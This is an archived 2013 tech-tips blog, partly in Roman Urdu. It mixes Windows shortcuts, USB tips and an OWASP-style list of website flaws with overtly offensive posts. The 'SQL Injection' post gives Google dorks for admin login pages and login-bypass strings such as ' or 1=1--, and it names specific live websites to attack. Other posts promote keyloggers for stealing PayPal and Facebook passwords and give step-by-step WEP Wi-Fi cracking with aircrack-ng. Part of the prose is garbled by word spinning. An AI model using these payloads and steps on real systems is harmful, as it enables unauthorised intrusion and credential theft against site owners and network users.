Tuesday 30 April 2013

Ufone Free Internet

Free Internet APN=ufone.pmms Ip=172.016.013.26 Port=8080 Use UCWeb Browing fore Free Internet. Use this trick with Zero Balnce

Monday 29 April 2013

All KeyBoard ShortCut Keys. See Must

Windows Logo: Start menu
Windows Logo + R: Run dialog box
Windows Logo + M: Minimize all
SHIFT + Windows Logo+M: Undo minimize all
Windows Logo + F1: Help
Windows Logo + E: Windows Explorer
Windows Logo + F: Find files or folders
Windows Logo + D: Minimizes all open windows and displays the desktop
CTRL + Windows Logo + F: Find computer
CTRL + Windows Logo + TAB: Moves focus from Start, to the Quick Launch toolbar, to the system tray (use RIGHT ARROW or LEFT ARROW to move focus to items on the Quick Launch toolbar and the system tray)
Windows Logo + TAB: Cycle through taskbar buttons
Windows Logo + Break: System Properties dialog box
Application key: Displays a shortcut menu for the selected item


Microsoft Natural Keyboard with IntelliType Software Installed:



Windows Logo + L: Log off Windows
Windows Logo + P: Starts Print Manager
Windows Logo + C: Opens Control Panel
Windows Logo + V: Starts Clipboard
Windows Logo + K: Opens Keyboard Properties dialog box
Windows Logo + I: Opens Mouse Properties dialog box
Windows Logo + A: Starts Accessibility Options (if installed)
Windows Logo + SPACEBAR: Displays the list of Microsoft IntelliType shortcut keys
Windows Logo + S: Toggles CAPS LOCK on and off


Dialog Box Keyboard Commands:


TAB: Move to the next control in the dialog box
SHIFT + TAB: Move to the previous control in the dialog box
SPACEBAR: If the current control is a button, this clicks the button. If the current control is a check box, this toggles the check box. If the current control is an option, this selects the option.
ENTER: Equivalent to clicking the selected button (the button with the outline)
ESC: Equivalent to clicking the Cancel button
ALT + underlined letter in dialog box item: Move to the corresponding item


General Keyboard-Only Commands:


F1: Starts Windows Help
F10: Activates menu bar options
SHIFT + F10: Opens a shortcut menu for the selected item (this is the same as right-clicking an object
CTRL + ESC: Opens the Start menu (use the ARROW keys to select an item)
CTRL + ESC or ESC: Selects the Start button (press TAB to select the taskbar, or press SHIFT+F10 for a context menu)
ALT + DOWN ARROW: Opens a drop-down list box
ALT + TAB: Switch to another running program (hold down the ALT key and then press the TAB key to view the task-switching window)
SHIFT: Press and hold down the SHIFT key while you insert a CD-ROM to bypass the automatic-run feature
ALT + SPACE: Displays the main window's System menu (from the System menu, you can restore, move, resize, minimize, maximize, or close the window)
ALT +- (ALT + hyphen): Displays the Multiple Document Interface (MDI)child window's System menu (from the MDI child window's System menu, you can restore, move, resize, minimize, maximize, or close the child window)
CTRL + TAB: Switch to the next child window of a Multiple Document Interface (MDI) program
ALT + underlined letter in menu: Opens the menu
ALT + F4: Closes the current window
CTRL + F4: Closes the current Multiple Document Interface (MDI) window
ALT + F6: Switch between multiple windows in the same program (for example, when the Notepad Find dialog box is displayed
ALT + F6: switches between the Find dialog box and the main Notepad window)


Shell Objects and General Folder/Windows Explorer Shortcuts For a selected object:
F2: Rename object
F3: Find all files
CTRL + X: Cut
CTRL + C: Copy
CTRL + V: Paste
SHIFT + DELETE: Delete selection immediately, without moving the item to the Recycle Bin
ALT + ENTER: Open the properties for the selected object
To Copy a File: Press and hold down the CTRL key while you drag the file to another folder.
To Create a Shortcut: Press and hold down CTRL+SHIFT while you drag a file to the desktop or a folder.


General Folder/Shortcut Control:



F4: Selects the Go To A Different Folder box and moves down the entries in the box (if the toolbar is active in Windows Explorer)
F5: Refreshes the current window.
F6: Moves among panes in Windows Explorer
CTRL + G: Opens the Go To Folder tool (in Windows 95 Windows Explorer only)
CTRL + Z: Undo the last command
CTRL + A: Select all the items in the current window
BACKSPACE: Switch to the parent folder
SHIFT + click + Close button: For folders, close the current folder plus all parent folders
Windows XP Shortcuts:
CODE


ALT+- (ALT+hyphen) Displays the Multiple Document Interface (MDI) child window's System menu
ALT+ENTER View properties for the selected item
ALT+ESC Cycle through items in the order they were opened
ALT+F4 Close the active item, or quit the active program
ALT+SPACEBAR Display the System menu for the active window
ALT+TAB Switch between open items
ALT+Underlined letter Display the corresponding menu
BACKSPACE View the folder one level up in My Computer or Windows Explorer
CTRL+A Select all
CTRL+B Bold
CTRL+C Copy
CTRL+I Italics
CTRL+O Open an item
CTRL+U Underline
CTRL+V Paste
CTRL+X Cut
CTRL+Z Undo
CTRL+F4 Close the active document
CTRL while dragging Copy selected item
CTRL+SHIFT while dragging Create shortcut to selected iteM
CTRL+RIGHT ARROW Move the insertion point to the beginning of the next word
CTRL+LEFT ARROW Move the insertion point to the beginning of the previous word
CTRL+DOWN ARROW Move the insertion point to the beginning of the next paragraph
CTRL+UP ARROW Move the insertion point to the beginning of the previous paragraph
SHIFT+DELETE Delete selected item permanently without placing the item in the Recycle Bin
ESC Cancel the current task
F1 Displays Help
F2 Rename selected item
F3 Search for a file or folder
F4 Display the Address bar list in My Computer or Windows Explorer
F5 Refresh the active window
F6 Cycle through screen elements in a window or on the desktop
F10 Activate the menu bar in the active program
SHIFT+F10 Display the shortcut menu for the selected item
CTRL+ESC Display the Start menu
SHIFT+CTRL+ESC Launches Task Manager
SHIFT when you insert a CD Prevent the CD from automatically playing
WIN Display or hide the Start menu
WIN+BREAK Display the System Properties dialog box
WIN+D Minimizes all Windows and shows the Desktop
WIN+E Open Windows Explorer
WIN+F Search for a file or folder
WIN+F+CTRL Search for computers
WIN+L Locks the desktop
WIN+M Minimize or restore all windows
WIN+R Open the Run dialog box
WIN+TAB Switch between open items

Windows Explorer Shortcuts:
CODE

ALT+SPACEBAR - Display the current window?s system menu
SHIFT+F10 - Display the item's context menu
CTRL+ESC - Display the Start menu
ALT+TAB - Switch to the window you last used
ALT+F4 - Close the current window or quit
CTRL+A - Select all items
CTRL+X - Cut selected item(s)
CTRL+C - Copy selected item(s)
CTRL+V - Paste item(s)
CTRL+Z - Undo last action
CTRL+(+) - Automatically resize the columns in the right hand pane
TAB - Move forward through options
ALT+RIGHT ARROW - Move forward to a previous view
ALT+LEFT ARROW - Move backward to a previous view
SHIFT+DELETE - Delete an item immediately
BACKSPACE - View the folder one level up
ALT+ENTER - View an item?s properties
F10 - Activate the menu bar in programs
F6 - Switch between left and right panes
F5 - Refresh window contents
F3 - Display Find application
F2 - Rename selected item
Internet Explorer Shortcuts:

CTRL+A - Select all items on the current page
CTRL+D - Add the current page to your Favorites
CTRL+E - Open the Search bar
CTRL+F - Find on this page
CTRL+H - Open the History bar
CTRL+I - Open the Favorites bar
CTRL+N - Open a new window
CTRL+O - Go to a new location
CTRL+P - Print the current page or active frame
CTRL+S - Save the current page
CTRL+W - Close current browser window
CTRL+ENTER - Adds the <!-- m --><a class="postlink" href="http://www">http://www</a><!-- m -->. (url) .com
SHIFT+CLICK - Open link in new window
BACKSPACE - Go to the previous page
ALT+HOME - Go to your Home page
HOME - Move to the beginning of a document
TAB - Move forward through items on a page
END - Move to the end of a document
ESC - Stop downloading a page
F11 - Toggle full-screen view
F5 - Refresh the current page
F4 - Display list of typed addresses
F6 - Change Address bar and page focus
ALT+RIGHT ARROW - Go to the next page
SHIFT+CTRL+TAB - Move back between frames
SHIFT+F10 - Display a shortcut menu for a link
SHIFT+TAB - Move back through the items on a page
CTRL+TAB - Move forward between frames
CTRL+C - Copy selected items to the clipboard
CTRL+V - Insert contents of the clipboard
ENTER - Activate a selected link
HOME - Move to the beginning of a document
END - Move to the end of a document
F1 - Display Internet Explorer Help

10 cool Tricks you can do with a USB flash drive.

Transporting your data is probably the most common use for a USB flash drive. But there's a world of other things you can do with these handy pocket-size drives. Here are 10 ways you can use that USB flash drive to do more than simply just move data.

1: Run portable applications

In addition to storing your data, you can run portable applications from a USB flash drive. For example, OpenOffice, which is a complete office suite that includes a word processor, spreadsheet, presentation tool, drawing package, and database, is available as a portable application. Mozilla Firefox and Thunderbird are also available as portable applications. When you combine the office suite with the ability to surf the Web and check email, you'll be able to take your most vital computing applications with you wherever you go -- right in your pocket.
If that's not enough, you can choose other applications to install on your USB flash drive. You can even install an entire prepackaged suite of applications that includes such things as an audio player, games, an antivirus utility, and a handy menu system.

2: Boot an operating system

If you want to do more than just run your own applications, you might want to consider booting an entire operating system from your USB flash drive. You can boot either Windows or Linux from a USB flash drive; however, the process is not an exact science and you may be in for a technical adventure.

3: Connect to a wireless network

If you have a wireless network, you can use the Wireless Network Setup Wizard in Windows XP or the Windows Connect Now (WCN) feature built into Vista to save wireless network configuration information to a USB flash drive. You can then use your drive to quickly and easily connect another computer or a WCN-compatible device, such as a router or printer, to your wireless network. To learn more about using the Wireless Network Setup Wizard, see the Help And Support Center, which is accessible from Windows XP's Start menu. To learn more about using the Windows Connect Now feature, see Windows Help And Support, which is accessible from Windows Vista's Start menu.

4: Create a password reset disk

A password reset disk can really come in handy if you forget the password to your user account on a Windows system that is not a part of a domain. If you find yourself in that situation, you can use the password reset disk to reset your password and quickly get back into your user account. In Windows Vista, you can use USB flash drive rather than a floppy disk as a password reset disk.

5: Boost performance

If you're running Windows Vista, you can use a USB flash drive to speed up your system with the ReadyBoost technology. ReadyBoost can use the storage space on a USB Flash drive as an additional memory cache to aid the memory cache on your hard disk. And because flash memory is more responsive than a hard disk, with its physical moving parts, the memory cache provided by ReadyBoost can significantly improve system responsiveness. Using ReadyBoost is easy. You just insert your USB flash drive into your Vista system and follow the onscreen prompts to configure and use ReadyBoost

6: Manage it

If all you really want to do with your USB flash drive is transport data, and you're running Windows XP, you can do so more efficiently with the Microsoft USB Flash Drive Manager Once you have installed this manager, you can easily copy files to and from your drive, back up and restore the entire flash drive to and from your hard disk, change the drive label, and even create an autorun.inf file to launch Drive Manager automatically when you plug in the drive.

7: Use it as an MP3 player

Would you like to be listening to music when you're using a computer at the office, but you don't have an MP3 player? If so, you can use a USB flash drive as an MP3 player along with Windows Media Player and a set of headphones. Just copy your MP3 files to your USB flash drive, plug it into your computer, and direct Windows Media Player to build a library of the songs on your drive. You can use all of Windows Media Player's playback features, such as playlists and favorites, to easily customize your music listening experience. And best of all, you won't have to worry about running low on battery power.

8: Password-protect it

If you use a USB flash drive to transport sensitive data that you would prefer to protect from prying eyes, should you lose the drive, Rohos Mini Drive (Figure D) can safeguard that data. This security tool allows you to create a secret partition on the drive and then password-protect/encrypt that partition, thus protecting any documents you copy to that partition via the utility's file manager

9: Run a Web site from it

If you are a Web developer, you may be interested to know that with Server2Go, you can easily run a Web server that supports Apache, PHP, MySQL, and Perl right from a USB flash drive. You can use Server2Go right out of the box without any installation. It runs on all versions of Windows, supports most common browsers, and is completely free. To a developer, the benefits of having a portable Web server on a USB drive are numerous. For example, imagine being able to carry a live Web site demo into a sales pitch meeting

10: Lock your PC

Have you ever seen a movie in which a person in some secret government installation simply inserts and removes a card to log in and log out of a PC? If you thought that idea was cool, you'll definitely want to investigate Predator . Once installed and configured, this little freeware utility will allow you to turn a USB flash drive into a key you can use to lock and unlock your computer.


While the USB flash drive is connected to your computer, everything works as it normally would. Once you remove the USB flash drive, your computer is locked down -- the keyboard and mouse are disabled and the screen darkens. To unlock your computer, you just plug in the USB flash drive and the computer will be unlocked and you can begin using it. __________________

Check your laptop's battery and energy report through command Prompt

Follow these steps To check

Step1: Open command prompt
To open command prompt click on start button, click run, type "command" in run box and click on ok

Step2: Write "powercfg energy" in command prompt and press enter

wait for 60 seconds, after 60 seconds a report will open in your default browser.

Thursday 25 April 2013

Remote Keyloggers 2013 : Hack Paypal Facebook Hotmail Password Using Keylogger

Keylogger or Sypware software has the capability to record keystroke/captures Screen Shots and save it to a log file (usually encrypted) for future use. Captures every key pressed on the computer viewed by the unauthorized user. Key logger software can record instant messages, e-mail and any information you type at any time on your keyboard. The log file created by the key logger can then be saved to a specific location or mailed to the concerned person. The software will also record any e-mail address you use and Website URLs visited by you.



Some advance Keylogger with its more powerful features and advanced technology captures the Desktop snapshots at regular interval of time and records the keyboard typed activities in a hidden password protected and encrypted log file. Using this spy software you can see exactly what your family members, employees or other users are doing on the computer in your absence. Provide advance settings to recorded data in encrypted log file format and delivers to administrator via email or using FTP settings. Password protected Key logger is useful for Computer professionals, Company managers, Business organization, Administrators, Parents, IT security specialists, Colleges, Universities to keep close watch on the PC users while being far away.

Today in this article, I am going to write review on top advance keyloggers because many of my website readers still get confused on which remote keylogger they have to choose. I get a lot of emails and comments asking me which keylogger should i choose ? Which is the best keylogger ? etc..

Friday 19 April 2013

HoW to block software with 0uT any sOftware.

H0W to  bl0ck s0ftware with 0uT any sOftware. .
G0to start and then g0to Run .
N0w g0to c:/wind0ws/sys32/drivers .
In this f0lder you can see a file with name "h0st".
Open n0tepad and dr0p thIs file in it.
G0 d0wn in thIs you wil see "127.0.0.1" l0cal h0st or you may find this by pressing ctrl+f. N0w do the final step just add the website y0u want to bl0ck bl0w the 127.0.0.1
Ab aap VLC Player pai live 3 Channels chala sakte hain.
Open VLC player phir CTRL + N Press karey New Window open hogi wahan ya Coding dey. Rtsp:202.125.158.230.554/stream1_wifi.sdp
Stream1 ki jaga ager aap stream2 day ge tho Ary chalega Ager stream3 dayge Tho CNN chalega

Wednesday 17 April 2013

YouTube Tip

Go To YouTube
Write In The Search Bar:
Do The Harlem Shake
Wait 5 Seconds Without Touching Anything
Enjoy :-P

"LOG OUT YOUR FACEBOOK ACCOUNT FROM OTHER COMPUTER"

"LOG OUT YOUR FACEBOOK
ACCOUNT FROM OTHER
COMPUTER" :
Sometimes we go to cyber cafe or
any other places just to open our
facebook account but forget to log out..:DNo need to worry about
it, there is a way to log it out from
any other computer.... :)
* log in your account (from
anywhere)
* go to Account Settings (located
in the right side of Home)
* Choose "Security"
* Go to Active Sessions (All of your
Log-ins are listed their
everywhere..)
* Click End Activity and You will be
Logged Out.. :P
Done. . !!

Top Ten Reasons by which Websites Got Hacked

1. Cross site scripting (XSS)
The problem: The “most prevalent and pernicious” Web application security vulnerability, XSS flaws happen when an application sends user data to a Web browser without first validating or encoding the content. This lets hackers execute malicious scripts in a browser, letting them hijack user sessions, deface Web sites, insert hostile content and conduct phishing and malware attacks.
Attacks are usually executed with JavaScript, letting hackers manipulate any aspect of a page. In a worst-case scenario, a hacker could steal information and impersonate a user on a bank’s Web site.
Real-world example: PayPal was targeted last year when attackers redirected PayPal visitors to a page warning users their accounts had been compromised. Victims were redirected to a phishing site and prompted to enter PayPal login information, Social Security numbers and credit card details.
How to protect users: Use a whitelist to validate all incoming data, which rejects any data that’s not specified on the whitelist as being good. This approach is the opposite of blacklisting, which rejects only inputs known to be bad. Additionally, use appropriate encoding of all output data. Validation allows the detection of attacks, and encoding prevents any successful script injection from running in the browser.


2. Injection flaws
The problem: When user-supplied data is sent to interpreters as part of a command or query, hackers trick the interpreter which interprets text-based commands into executing unintended commands. Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application. In the worst-case scenario, these flaws allow an attacker to completely compromise the application and the underlying systems, even bypassing deeply nested firewalled environments.
Real-world example: Russian hackers broke into a Rhode Island government Web site to steal credit card data in January 2006. Hackers claimed the SQL injection attack stole 53,000 credit card numbers, while the hosting service provider claims it was only 4,113.
How to protect users: Avoid using interpreters if possible. If you must invoke an interpreter, the key method to avoid injections is the use of safe APIs, such as strongly typed parameterized queries and object relational mapping libraries.
3. Malicious file execution
The problem: Hackers can perform remote code execution, remote installation of rootkits, or completely compromise a system. Any type of Web application is vulnerable if it accepts filenames or files from users. The vulnerability may be most common with PHP, a widely used scripting language for Web development.
Real-world example: A teenage programmer discovered in 2002 that Guess.com was vulnerable to attacks that could steal more than 200,000 customer records from the Guess database, including names, credit card numbers and expiration dates. Guess agreed to upgrade its information security the next year after being investigated by the Federal Trade Commission.
How to protect users: Don’t use input supplied by users in any filename for server based resources, such as images and script inclusions. Set firewall rules to prevent new connections to external Web sites and internal systems.
4. Insecure direct object reference
The problem: Attackers manipulate direct object references to gain unauthorized access to other objects. It happens when URLs or form parameters contain references to objects such as files, directories, database records or keys.
Banking Web sites commonly use a customer account number as the primary key, and may expose account numbers in the Web interface.
References to database keys are frequently exposed. An attacker can attack these parameters simply by guessing or searching for another valid key. Often, these are sequential in nature.
Real-world example: An Australian Taxation Office site was hacked in 2000 by a user who changed a tax ID present in a URL to access details on 17,000 companies. The hacker e-mailed the 17,000 businesses to notify them of the security breach.
How to protect users: Use an index, indirect reference map or another indirect method to avoid exposure of direct object references. If you can’t avoid direct references, authorize Web site visitors before using them
5. Cross site request forgery
The problem simple and devastating this attack takes control of victim’s browser when it is logged onto a Web site, and sends malicious requests to the Web application. Web sites are extremely vulnerable, partly because they tend to authorize requests based on session cookies or “remember me” functionality. Banks are potential targets.
Ninety-nine percent of the applications on the Internet are susceptible to cross site request forgery.
Real-world example: A hacker known as Samy gained more than a million “friends” on MySpace.com with a worm in late 2005, automatically including the message “Samy is my hero” in thousands of MySpace pages. The attack itself may not have been that harmful, but it was said to demonstrate the power of combining cross site scripting with cross site request forgery. Another example that came to light one year ago exposed a Google vulnerability allowing outside sites to change a Google user’s language preferences.
How to protect users: Don’t rely on credentials or tokens automatically submitted by browsers. The only solution is to use a custom token that the browser will not ‘remember’.
6. Information leakage and improper error handling
The problem: Error messages that applications generate and display to users are useful to hackers when they violate privacy or unintentionally leak information about the program’s configuration and internal workings.
Web applications will often leak information about their internal state through detailed or debug error messages. Often, this information can be leveraged to launch or even automate more powerful attacks.
Real-world example: Information leakage goes well beyond error handling, applying also to breaches occurring when confidential data is left in plain sight. The ChoicePoint debacle in early 2005 thus falls somewhere in this category. The records of 163,000 consumers were compromised after criminals pretending to be legitimate ChoicePoint customers sought details about individuals listed in the company’s database of personal information. ChoicePoint subsequently limited its sales of information products containing sensitive data.
How to protect users: Use a testing tool such as OWASP’S WebScarab Project to see what errors your application generates. Applications that have not been tested in this way will almost certainly generate unexpected error output.
7. Broken authentication and session management
The problem: User and administrative accounts can be hijacked when applications fail to protect credentials and session tokens from beginning to end. Watch out for privacy violations and the undermining of authorization and accountability controls.
Flaws in the main authentication mechanism are not uncommon, but weaknesses are more often introduced through ancillary authentication functions such as logout, password management, timeout, remember me, secret question and account update .
Real-world example: Microsoft had to eliminate a vulnerability in Hotmail that could have let malicious JavaScript programmers steal user passwords in 2002. Revealed by a networking products reseller, the flaw was vulnerable to e-mails containing Trojans that altered the Hotmail user interface, forcing users to repeatedly reenter their passwords and unwittingly send them to hackers.
How to protect users: Communication and credential storage has to be secure. The SSL protocol for transmitting private documents should be the only option for authenticated parts of the application, and credentials should be stored in hashed or encrypted form.
Another tip: get rid of custom cookies used for authentication or session management.
8. Insecure cryptographic storage
The problem: Many Web developers fail to encrypt sensitive data in storage, even though cryptography is a key part of most Web applications. Even when encryption is present, it’s often poorly designed, using inappropriate ciphers.
These flaws can lead to disclosure of sensitive data and compliance violations.
Real-world example: The TJX data breach that exposed 45.7 million credit and debit card numbers. A Canadian government investigation faulted TJX for failing to upgrade its data encryption system before it was targeted by electronic eavesdropping starting in July 2005.
How to protect users: Don’t invent your own cryptographic algorithms. Only use approved public algorithms such as AES, RSA public key cryptography, and SHA-256 or better for hashing.
Furthermore, generate keys offline, and never transmit private keys over insecure channels.
9. Insecure communications
The problem: Similar to No. 8, this is a failure to encrypt network traffic when it’s necessary to protect sensitive communications. Attackers can access unprotected conversations, including transmissions of credentials and sensitive information. For this reason, PCI standards require encryption of credit card information transmitted over the Internet.
Real-world example: TJX again. Investigators believe hackers used a telescope-shaped antenna and laptop computer to steal data exchanged wirelessly between portable price-checking devices, cash registers and store computers, the Wall Street Journal reported.
“The $17.4-billion retailer’s wireless network had less security than many people have on their home networks,” the Journal wrote. TJX was using the WEP encoding system, rather than the more robust WPA.
How to protect users: Use SSL on any authenticated connection or during the transmission of sensitive data, such as user credentials, credit card details, health records and other private information. SSL or a similar encryption protocol should also be applied to client, partner, staff and administrative access to online systems. Use transport layer security or protocol level encryption to protect communications between parts of your infrastructure, such as Web servers and database systems.
10. Failure to restrict URL access
The problem: Some Web pages are supposed to be restricted to a small subset of privileged users, such as administrators. Yet often there’s no real protection of these pages, and hackers can find the URLs by making educated guesses.
The attacks targeting this vulnerability are called forced browsing, which encompasses guessing links and brute force techniques to find unprotected pages.
Real-world example: A hole on the Macworld Conference & Expo Web site this year let users get “Platinum” passes worth nearly $1,700 and special access to a Steve Jobs keynote speech, all for free. The flaw was code that evaluated privileges on the client but not on the server, letting people grab free passes via JavaScript on the browser, rather than the server.
How to protect users: Don’t assume users will be unaware of hidden URLs. All URLs and business functions should be protected by an effective access control mechanism that verifies the user’s role and privileges. Make sure this is done … every step of the way, not just once towards the beginning of any multistage process.

SQL Injection

Sub Pehly Ap Google.com Open Karyn
Phr Ap Google Search Bar Mein Type Karyn


inurl:adminlogin.asp

inurl:admin_login.asp

inurl:adminlogon.asp

inurl:admin_logon.asp

inurl:\\admin/admin_login.php

inurl:/admin.asp

inurl:/login.asp

inurl:/logon.asp

inurl:/adminlogin.asp

inurl:/adminlogon.asp

inurl:/admin_login.asp

inurl:/admin_logon.asp

inurl:/admin/admin.asp

inurl:/admin/login.asp

inurl:/admin/logon.asp

inurl:/admin/adminlogin.asp

inurl:/admin/adminlogon.asp

inurl:/admin/admin_login.asp

inurl:/admin/admin_logon.asp

inurl:/administrator/admin.asp

inurl:/administrator/login.asp

inurl:/administrator/logon.asp

inurl:root/login.asp

inurl:admin/index.asp





admin'--



1'or'1'='1



' or 0=0 --



" or 0=0 --



or 0=0 --



' or 0=0 #



" or 0=0 #



or 0=0 #



' or 'x'='x



" or "x"="x



') or ('x'='x



' or 1=1--



" or 1=1--



or 1=1--



' or a=a--



" or "a"="a



') or ('a'='a



") or ("a"="a



hi" or "a"="a



hi" or 1=1 --



hi' or 1=1 --



hi' or 'a'='a



hi') or ('a'='a



hi") or ("a"="a



1' OR '1'='1 (Koi Ek Dalna Ha Password Mein)



Phr Click Kryn Enter. u r in admin panel Try here
http://shopping.richardhealey.com/



http://www.amskrupajal.org/AdminLogin.asp


admin = 1'or'1'='1 pass = 1'or'1'='1



http://www.alertfx.com/admin/admin.asp

admin = 1'or'1'='1 pass = 1'or'1'='1

How to Detect if Someone's Stealing Your WiFi


  Since you cannot see who's got a laptop attached to your wireless router, is there any thanks to recognize obviously if somebody else has hijacked your signal?

Detect wireless fidelity crook
It may be arduous to imagine, however simply a mere twenty years agone, the web was nothing quite a novelty -- how for unbelievably good faculty professors and researchers to share data, and for a number of folks to network across the recently developed World Wide internet. E-mail was nothing find it irresistible is nowadays. The primitive e-mail systems found at universities or perhaps through accounts offered with the primary web service suppliers (ISPs) like Prodigy and America on-line were usually tough to use.

Fast forward to 2009 and things have modified considerably. Back within the day, you procured web access by the minute. that is not the case any longer. Like just about each technology, changes occur quickly and sometimes for the higher. On high of that, the technology becomes cheaper and easier to use. the web has definitely undergone this transformation. the foremost recent advance in electronic communication is wireless web or wireless fidelity. Found in occasional retailers, libraries and airports throughout the planet, wireless fidelity has created victimisation the web virtually as common as victimisation your mobile phone -- that in itself is technology that exploded over the past decade. sadly, unsavory activities inevitably realize how to enter even the foremost benign settings just like the web, and that is (probably) why you are here.

Chances are you are reading this text as a result of you think somebody is piggybacking or victimisation your wireless fidelity while not your permission and you would like to find out the way to verify if you are correct. once wireless squatters steal your wireless fidelity, they block your information measure and what is worse, they will even steal data off your laptop or infect machines on your network with an endemic. Fear not, this text can offer you the ammunition to fight back. Let's begin by taking a fast explore what makes up your wireless fidelity network therefore you'll prepare yourself to require management of the web association you acquire.
Understanding Your WiFi Network

Before you can detect if someone is ripping off your wireless Internet connection, it's important to understand some basic computer networking lingo. For more information on how to set up a wireless network, t's look at a few of the areas in a wireless network that will give you a baseline for determining if your WiFi signal is being sapped unexpectedly.

A wireless network is comprised of a broadband Internet connection from a DSL, cable or satellite modem. You attach the modem to the wireless router, which distributes the signal and creates a network.

This is what's called a local area network (LAN). This LAN is where you set up computer peripherals such as your desktop or laptop computer and printer. Your router will have what's called a dynamic host client protocol (DHCP) table. In essence, your DHCP table is your guest list of every allowed piece of computing equipment.

Each device has its own media access control (MAC) address. Think of this as its signature. MAC addresses are assigned by the manufacturer, but can be changed by users, if they know how. Your router uses these addresses to assign each machine on your network an Internet protocol or IP address. The MAC and IP addresses of your equipment will be useful in a moment when we look at ways to detect whether or not someone is stealing your WiFi. For a more in-depth understanding of IP addresses, read What is an IP address?

If you're confused by some of this computer rhetoric, don't be. What's important is that you know what to look for when we get ready to diagnose your WiFi connection. Speaking of which, let's get to it in the next section. After all, that's what you came here for.

Detecting Wireless Piggybacking

Okay, it's time to get down to it. Is your wireless network running slowly? Do you have intermittent losses in Internet access and you can't figure out why? Chances are, you've already detected a WiFi squatter and didn't even know it. If you regularly experience these problems, maybe you have something wrong with your wireless connection. But if you're suddenly having intermittent problems with your Internet performance, especially at the same time each day, it's a red flag that someone is piggybacking off your wireless connection and it's time for you to diagnose your WiFi network.

The first and simplest thing you can do is check out your wireless network connection and see if it's secure. When you install your router, you're given the option of setting a wireless encryption protocol (WEP) key. Basically this is a password-protected method for you to log on to your own wireless network. If you don't have one, you're operating an open network. That means anyone within range can use your wireless for free. While it's not hacking, it is debatable as to whether this is actually stealing. In any case, if you don't have a WEP key, you're vulnerable to WiFi squatting and certainly not deterring squatters.

Even if you have a WEP key, that doesn't necessarily mean your neighbor hasn't bypassed it. To determine if he or she is logging onto your wireless network, you can do so by checking your wireless network log. The exact steps vary depending on your computer's operating system, but in general, if you look at your network and see more devices connected than you have allowed on your network, you have WiFi thieves.

A similar method to determining the status of your WiFi user list is to check your router's DHCP client table. Much like viewing your network, your DHCP client table will list the machines on your network. If the number exceeds what you've set up, you have someone stealing your WiFi.

Nobody wants to be taken advantage of. What's more, you certainly don't want illegal information flowing through your wireless network. That's why you need to take matters in your own hands. The final section will give you the power to thwart off Internet thieves and protect your wireless connection. Are you ready to fight back?.

Stopping Digital Thieves

A WEP key is an absolute must for any wireless network; however, even those are vulnerable. While WEP protection will stop the guy parking in front of your house, it may not stop a more determined user like your neighbor. In that case, you can use a security protocol such as WiFi protected access (WPA); or even better the newer WPA2. This route is more secure but can still be hacked by a determined WiFi thief; though again WPA2 will make this a lot more difficult.

You can also use manual DHCP assignment. To do this, simply set your router's DHCP to the manual setting and enter in each of your computer's physical addresses. This will restrict your network to allow only those computers recognized by the router.

If the manual DHCP route isn't comfortable for your level of computer expertise, you may want to consider generating a MAC access list which usually can be created through the browser interface of the router. Unfortunately, MAC address lists can also be bypassed by savvy WiFi thieves; nevertheless, when used in conjunction with other security methods, they're probably enough on a small home network.

Internet monitoring software is also a viable option. Monitoring software will walk you through some of these methods and is user friendly for those who aren't as comfortable setting up wireless security methods. In addition, monitoring software makes it easy to see what is going on with your wireless connection. Your WiFi router may have some built-in software that will help you monitor your network. Explore the user guide and help section to see if there's a built-in application that will help.

Finally, turn off your router's SSID broadcasting. This effectively makes your network invisible. It's much harder to steal WiFi from a network that doesn't appear on anyone's radar.

Next time you suspect WiFi theft, peek out the front window and see if an unfamiliar car is parked in front of or close to your home. If so, you'll probably find someone in the car sapping your Internet. It sounds simple, but it could be just that easy to determine if someone is stealing your WiFi

Hack Any Password Protected Wi-Fi Network And Use Unlimited Free Interne

"Wi-Fi" is a type of wireless networking protocol that allows devices to communicate without cords or cables.

1: Wi-fi uses antennas around which wi-fi "hotspots" are created. The hotspots are outlets equipped to receive the radio waves that power wireless networking. Until recently, wi-fi has been confined to more than 10,000 hot-spots in cafes, bars and airport lounges. But various projects are under way to set up city-wide zones, where a series of antennas are installed in the streets, on lampposts or street signs. The hotspots around them together create a much wider area of coverage. Norwich has a mesh network which links each lamppost antenna to the next creating a seamless wi-fi hotspot around the center of the city.
2: The source internet connection is provided by a PC or server to which the antennas are connected either wirelessly or via a cable.
3: Some mobile phones and personal digital assistants (PDA) now have wi-fi chips installed. With mobile phones, this means conventional networks can be bypassed and inexpensive long-distance calls made over the web (using Voice over Internet Protocol, VoIP).
4: Many laptops and handheld computers now come with built-in wi-fi connectivity; it is also possible to add wi-fi to your computer with a special card that plugs into a port on your laptop.
Some organizations provide it for free but maximums provide it for business purpose only. And you have to give a password to access this kind of network.
This software price is $1099. Don't worry, I'm giving you for FREE.
Download This Software from HERE. [Mediafire Link]
Now follow the Instructions bellow:
1. Install the software and drivers.
2. Click on ‘Rules’ tab and tick on ‘Enable advance rules’ option.
3. Type ‘a’ on Name box and Past this code on formula box “tods=1 and dmac=FF:FF:FF:FF:FF:FF” like picture bellow. Then click ‘add/edit’ button.
4. A window will appear like the picture bellow. Give a tick on ‘a’ .

5. Then go to ‘Settings’ and click ‘Option’
6. Go to ‘Memory Usage’ tab and set everything just like this picture & click ‘Ok’ (Restart may be required).
7.  Check ‘D’ funnel and uncheck another two funnel from the right top of this window.

8. Click ‘Search’ button and find the network that you want to creak.
9. Then drag it on ‘Channel’ tab and click ‘Capture’ button.
10. Now which one is do not capturing anything give it to password protected network and connect it. When it will ask for password, give any as you wish.
11. It will show this massage “Connected with limited connectivity”.
(I have no Wi-Fi connections at this time. that is why, I can’t share some screenshots).
12. Click on main menu again and then click on ‘Packets’ Tab. If everything was all right, you will see some Couple of Packets.
13. Click right button on “ARP REQ”  Packet and then > “Send Packet(s)” > Selected.
14. This menu will appear.
15. Now change all values just like this and click ‘Send’.
16. Go to ‘Rules’ Tab again and uncheck the Rules “a” .
17.  Select first 20000 packets and save it. Make sure you are saving it as “dump cap” file in place of “ncf” file format. (I have no Wi-Fi connections this time, that is why I can’t share some screenshots).
18. Now download a zip folder named “Aircrack-NG” from HERE. And extract it.

19. Open ‘bin’ folder and run this file ‘aircrack-ng-GUI.exe’. Then go where you saved the packets, select all and click launch.

20. An ‘IV’ list will came. Select the network that you want to creak.

21. Click ‘Connect’. You will be connected with your desire network like a magic !

22. Enjoy the Unlimited Wi-Fi Internet.

Also you can do with this software :

Monday 15 April 2013

WindOws Tips Collection

